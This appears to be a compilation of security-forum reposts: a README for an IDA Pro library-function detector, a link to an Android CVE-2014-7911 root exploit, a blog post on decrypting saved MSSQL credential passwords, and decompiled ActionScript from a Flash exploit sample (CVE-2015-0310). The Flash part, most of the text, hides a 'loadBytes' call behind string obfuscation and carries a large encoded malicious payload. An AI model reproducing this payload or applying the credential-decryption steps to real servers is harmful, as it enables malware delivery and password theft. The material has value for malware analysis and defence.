Statically linked Library detector slid All sample code is in the sample_code folder All screenshots are in the screenshots folder All code was tested on IDA PRO 6.4 on Windows 7. All commands are to be run from the Windows CMD prompt Sample code was compiled on Ubuntu 12.04 and gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) Get a list of all the functions and their instructions for the binary you want to reverse as well as all the libraries that you think may be part of it. Before running this script, make sure you have the binary you want to reverse as well as all the libraries you think are a part of the binary in the"C:\data\IDBstore" directory. For the code I used I put the test binary as well as all the files from the libc.a archive into the directory "C:\data\IDBstore". The libc.a archive was found on my system at /usr/lib/x86_64-linux-gnu/libc.a. The files from this archive can be extracted by using the command ar x /usr/lib/x86_64-linux-gnu/libc.a FOR %x IN ("C:\data\IDBstore*") do idaw64 -A -L"C:\data\log.txt" -S"C:\data\save_disasm.py" "%x" The result of running this script will store the disassembly of the binary to be reversed and a lot of the associated libraries in a folder called input. Look at 01.png for the result of this script. Compare functions of the binary with the functions of all the libraries. In the example below, the output of the statically linked binary is test_mnem.txt. The -m option compares only the mnemonics of all the functions. python function_compare.py test_mnem.txt -m The result of running this script will be stored in a new file called input_to_rename_function.txt. Look at 02.png for the result of this script. Use the output obtained from the previous script to accordingly rename functions inside IDA. Look at 03.png and 04.png before running this script. The line numbers show the starting (1039) and ending line numbers(1159) for sub_ functions. This means there are 120 functions. 05.png is a screenshot that shows how to run this script. idaw64 -A -L""C:\data\log.txt" -S"C:\data\rename.py" test The result of running this script is that all the functions that started with sub_ inside the binary to be reversed AND found a match with some library somewhere will be renamed. Open up the saved IDB as usual - you will see that a number of functions have been renamed. Look at 06.png and 07.png for the result of this script. The line numbers show the starting (1120) and ending line numbers(1159) for sub_ functions. This means that there are now 39 functions. This means that 81 functions were renamed because they matched some function inside libc.a. Look at 08.png and 09.png for examples of how the names of the functions look once they have been renamed. The functions whose names start with single are named because only a single match was found in libc.a. The functions whose names start with multiple are named because multiple matches were found in libc.a. Sursa: https://github.com/arvinddoraiswamy/slid

CVE-2014-7911_pocA Local root exploit for Nexus5 Android 4.4.4(KTU8P) author: retme (retme7@gmail.com) [font=Helvetica Neue @returnsme on twitter & @retme on weibo website: retme.net BUG info Full Disclosure: CVE-2014-7911: Android <5.0 Privilege Escalation using ObjectInputStream Analysis CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation - Palo Alto Networks BlogPalo Alto Networks Blog Sursa: https://github.com/retme7/CVE-2014-7911_poc

Decrypting MSSQL Credential Passwords Antti Rantasaari | January 26, 2015 A while ago I posted a blog on how to decrypt SQL Server link passwords (https://blog.netspi.com/decrypting-mssql-database-link-server-passwords/). By using the same technique it is possible to decrypt passwords for SQL Server Credentials as well. I modified the previously released password decryption script a little, namely by just changing the location where the encrypted passwords are stored, and released an updated PowerShell script for Credential decryption. Similar remarks as with link password decryption… From the offensive point of view, this is pretty far into post exploitation as sysadmin privileges are needed on the SQL server and local administrator privileges are needed on the Windows server. From the defensive point of view, I guess this would be just another reminder that there is a way to disclose most saved passwords. So do not leave unnecessary credentials on database servers and do not grant excessive privileges for credentials used to access external resources. SQL Server Credentials Microsoft SQL Server allows users to add Credentials to a database. The credentials, typically Windows usernames and passwords, can be used to access resources outside SQL Server. A single credential can be used by multiple SQL logins for external access. A simple example of credential use is the SQL Server proxy account. When xp_cmdshell is executed, by default it uses the permissions of the SQL Server service account. However, by configuring a proxy account for the server, it is possible to set xp_cmdshell to use a least privileged account for OS access rather than (quite often excessive) service account permissions. When credentials are added to a SQL Server, passwords have to be saved to the database using reversible encryption to allow for proper use of the credentials. It is possible to decrypt saved credentials password as explained in this blog. Credential Password Storage MSSQL stores credential passwords to the master.sys.sysobjvalues table. I was able to figure out the location of the encrypted passwords after looking at the definition of the master.sys.credentials view using the following query: Microsoft gives a pretty vague description for the table: “Exists in every database. Contains a row for each general value property of an entity.” Master.sys.sysobjvalues has a lot of data in it, but credential information appears to have valueclass 28. And encrypted passwords are stored in imageval column with valclass=28 and valnum=2. I could not find documentation about valclass and valnum but those values seemed to work on my test systems. The master.sys.sysobjvalues table cannot be accessed using a normal SQL connection, but rather a Dedicated Administrative Connection (DAC) is needed (more information about DAC at http://technet.microsoft.com/en-us/library/ms178068%28v=sql.105%29.aspx). MSSQL Encryption MSSQL encryption basics were detailed in my previous blog (https://blog.netspi.com/decrypting-mssql-database-link-server-passwords/). In a nutshell, the credential passwords are encrypted using Service Master Key (SMK) which can be obtained from the server using DPAPI. Decrypting Credential Passwords Depending on the version of the MSSQL server, the credential passwords are encrypted using AES (MSSQL 2012+) or 3DES (MSSQL 2008 and older). Passwords stored in sys.sysobjvalues imageval column must be parsed a little prior to decryption (luckily exactly the same way as link server passwords). After the parsing credential passwords can be decrypted using the SMK. Decrypting Credential Passwords with PowerShell – Get-MSSQLCredentialPasswords.psm1 A little modified version of “Get-MSSQLLinkPasswords.psm1?, unsurprisingly named “Get-MSSQLCredentialPasswords.psm1”, automates credential password decryption. The script can be downloaded from GitHub here: https://github.com/NetSPI/Powershell-Modules/blob/master/Get-MSSQLCredentialPasswords.psm1 The script must be run locally on the MSSQL server (as DPAPI requires access to the local machine key). The user executing the script must also have sysadmin access to all the database instances (for the DAC connection) and local admin privileges on the Windows server (to access the entropy bytes in registry). In addition, if UAC is enabled, the script must be ran as an administrator. Below is a summary of the process used by the script. Identify all of the MSSQL instances on the server. Attempt to create a DAC connection to each instance. Select the encrypted credential passwords from the “imageval” column of the “master.sys.sysobjvalues” table for each instance. Select the encrypted Service Master Key (SMK) from the “master.sys.key_encryptions” table of each instance where the “key_id” column is equal to 102. Select the version that has been encrypted as LocalMachine based on the “thumbprint” column. Extract the entropy value from the registry location HKLM:\\SOFTWARE\Microsoft\Microsoft SQL Server\[instancename]\Security\Entropy. Use the information to decrypt the SMK. The script determines the encryption algorithm (AES or 3DES) used to encrypt the SMK based on SQL Server version and SMK key length. Use the SMK to decrypt the credential passwords. If successful, the script displays the cleartext credential passwords. Below is an example of the end result: PS C:\> Get-MSSQLCredentialPasswords | out-gridview I’ve tested the script with MSSQL 2008 and 2012. There might be some bugs, but it appears to work reliably. Please let me know if you notice any errors or if I did not account for certain situations etc. Sursa: https://blog.netspi.com/decrypting-mssql-credential-passwords/

Exploit.SWF CVE-2015-0310 Code [/B][/FONT][/COLOR]@PhysicalDrive0 package { import flash.display.*; import flash.events.*; public class ep extends MovieClip { public static var ggew; public function ep(){ if (this.stage){ this.wweg(); } else { this.addEventListener(Event.ADDED_TO_STAGE, this.wweg); }; } private function InitEx():void{ ggew = jtyk.xxfrh(); var _local2:* = kryuje.wecy(); var _local3:* = /[3041526978]+/g; var _local4:* = "62l36z48a67d63B5m46t3e27s42".replace(_local3, ""); _local4 = _local4.replace("z", "o"); _local4 = _local4.replace("m", "y"); _local2[_local4](ggew); this.stage.addChild(_local2); } private function wweg(_arg1:Event=null):void{ this.removeEventListener(Event.ADDED_TO_STAGE, this.wweg); this.InitEx(); //unresolved jump !ERROR! } } ep = [OP_NEWCLASS ClassInfo:0 base:MovieClip]; kryuje = [OP_NEWCLASS ClassInfo:1 base:Object]; jtyk = [OP_NEWCLASS ClassInfo:2 base:Object]; }//package import flash.display.*; import flash.utils.*; package { public class kryuje { public static function wecy():Loader{ var _local1:* = new Loader(); return (_local1); } } }//package package { public final class jtyk { private static var ejtey:jtyk; public var ybe:String; public var vree:Class; public var weruji:String; public var fhrw:String; public var wxwrtu:String; public var erh:String; public var jetk:String; public var wxyhw:String; public var eruuf:String; public function jtyk(){ this.ybe = "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